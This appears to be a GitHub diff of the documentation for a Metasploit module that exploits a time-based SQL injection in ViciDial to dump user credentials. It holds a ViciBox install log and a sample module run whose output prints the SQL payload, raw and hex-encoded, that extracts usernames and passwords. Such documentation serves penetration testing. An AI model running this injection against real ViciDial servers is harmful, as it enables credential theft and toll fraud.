You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Use of uninitialized value $DBsvnrev in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, <STDIN> line 17.
121
+
Use of uninitialized value $localsvn in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, <STDIN> line 17.
122
+
Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 218, <STDIN> line 17.
123
+
Local SVN revision matches DB revision:
124
+
Doing general DataBase requirements...
125
+
Doing Master-specific MySQL setup...
126
+
Configuring Web Server...
127
+
Created symlink /etc/systemd/system/httpd.service → /usr/lib/systemd/system/apache2.service.
128
+
Created symlink /etc/systemd/system/apache.service → /usr/lib/systemd/system/apache2.service.
129
+
Created symlink /etc/systemd/system/multi-user.target.wants/apache2.service → /usr/lib/systemd/system/apache2.service.
130
+
Configuring Telephony Server...
131
+
Configuring Archive Server...
132
+
Nouveau mot de passe : MOT DE PASSE INCORRECT : trop simple/systématique
133
+
Retapez le nouveau mot de passe : passwd: password updated successfully
134
+
Created symlink /etc/systemd/system/multi-user.target.wants/vsftpd.service → /usr/lib/systemd/system/vsftpd.service.
135
+
Loading GMT and Phone Codes...
136
+
137
+
Seeding the audio store, this may take a while...
138
+
139
+
PLEASE use secure passwords inside vicidial. It prevents hackers
140
+
and other undesirables from compromising your system and costing
141
+
you thousands in toll fraud and long distance. A secure password
142
+
Contains at least one capital letter and one number. A good example
143
+
of a secure password would be NrWZDqL1Rg37uuC.
144
+
145
+
Don't feed the black market, secure your systems properly!
146
+
147
+
System should be installed. Please type 'reboot' to cleanly load everything.
148
+
149
+
```
150
+
151
+
7.**Post-Installation**:
152
+
- After installation, **reboot** the system.
153
+
- Access the web panel by navigating to the administration page and completing the initial setup.
28
154
29
155
## Verification Steps
30
156
@@ -50,24 +176,24 @@ Delay in seconds for SQL Injection sleep. Defaults to 1.
50
176
51
177
## Scenarios
52
178
53
-
### ViciBox 9.0.3
179
+
### ViciBox 11.0.1
54
180
55
181
```
56
-
msf6 auxiliary(scanner/http/vicidial_sql_enum_users_pass) > run https://192.168.1.100
57
-
[*] Running module against 192.168.1.100
182
+
msf6 auxiliary(scanner/http/vicidial_sql_enum_users_pass) > run http://192.168.1.4
183
+
[*] Running module against 192.168.1.4
58
184
59
185
[*] Checking if target is vulnerable...
60
186
[+] Target is vulnerable to SQL injection.
61
-
[*] {SQLi} Executing (select group_concat(aR) from (select cast(concat_ws(';',ifnull(User,''),ifnull(Pass,'')) as binary) aR from vicidial_users limit 1) juBM)
62
-
[*] {SQLi} Encoded to (select group_concat(aR) from (select cast(concat_ws(0x3b,ifnull(User,repeat(0x5b,0)),ifnull(Pass,repeat(0x7d,0))) as binary) aR from vicidial_users limit 1) juBM)
63
-
[*] {SQLi} Time-based injection: expecting output of length 16
187
+
[*] {SQLi} Executing (select group_concat(HCx) from (select cast(concat_ws(';',ifnull(User,''),ifnull(Pass,'')) as binary) HCx from vicidial_users limit 1) em)
188
+
[*] {SQLi} Encoded to (select group_concat(HCx) from (select cast(concat_ws(0x3b,ifnull(User,repeat(0x88,0)),ifnull(Pass,repeat(0x3f,0))) as binary) HCx from vicidial_users limit 1) em)
189
+
[*] {SQLi} Time-based injection: expecting output of length 13
0 commit comments